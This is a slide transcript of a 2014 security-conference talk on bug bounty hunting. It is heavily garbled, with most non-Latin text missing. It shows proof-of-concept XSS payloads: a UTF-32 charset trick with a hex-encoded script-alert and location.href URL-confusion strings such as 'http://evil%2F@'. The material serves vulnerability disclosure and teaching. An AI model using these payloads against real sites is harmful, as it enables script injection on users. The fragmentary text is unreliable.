Transcript of CODE BLUE 2014: The Joy of Bug Hunting by Masato Kinugawa
- 1. Masato Kinugawa
- 2. Masato Kinugawa () XSS
- 3. Bounty Program
- 4. Bug Bounty
- 5. 27135346
- 6. 27135346 (8)
- 7. !2010Google !
- 8. !Google Vulnerability Reward Program !1=$100~20,000 $130,803.7
127(/191)
- 9. UPUP!$
- 10.
- 11. ! ! ! !
- 12. !Google !$5,000()
- 13. https://accounts.google.com/example?oe=utf-32
HTTP/1.1 200 OK
Alternate-Protocol: 443:quic,p=0.01
Cache-Control: private, max-age=0
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-32
...
!URL !UTF-32
- 14. scriptalert(1)/script
- 15.
- 16. 0000220000003E0000003C00 000000730000006300000072
000000690000007000000074 00003E00000000610000006C
000000650000007200000074 000000280000003100000029
00003C000000002F00000073 000000630000007200000069
000000700000007400003E00 s c r i p t a l e r t ( 1 ) / s c r i p t
UTF-3241
- 17. IEUTF-32 0000220000003E0000003C00 000000730000006300000072
000000690000007000000074 00003E00000000610000006C
000000650000007200000074 000000280000003100000029
00003C000000002F00000073 000000630000007200000069
000000700000007400003E00 s c r i p t a l e r t ( 1 ) / s c r i p t
- 18. http://l0.cm/encodings/table/
- 19. IE( s c r i p t > a l e r t ( 1 ) / s c r i p t >
- 20.
- 21. !28.7% !87%IE
- 22. ! !IE Web
- 23. location.hrefJavaScript URL1 http://example.com/
http://example.com/ location.href
- 24. http://evil%2F@example.com/ location.href
http://evil/@example.com/ @URL URL
- 25. location.href @
- 26. http://evil%2F@www.youtube.com/
- 27. ! !RSSfeed://URL !URL@ ! XSS(^o^)/
- 28. feed://URL (=)
- 29. XSS XSS
- 30.
- 31. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/
- 32. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/ alert('CODEBLUE2n'+
document.domain+'')
- 33. !/ ! http://masatokinugawa.l0.cm/
- 34. ! ! !XSS6
- 35. ! 22009 ! !XSS6 2009
- 36. 2009 2010
- 37. : Google
- 38. ! !
- 39. ! ! ! ! !
- 40. 1
- 41. ()
- 42.
- 43. @kinugawamasato masatokinugawa[at]gmail.com Contact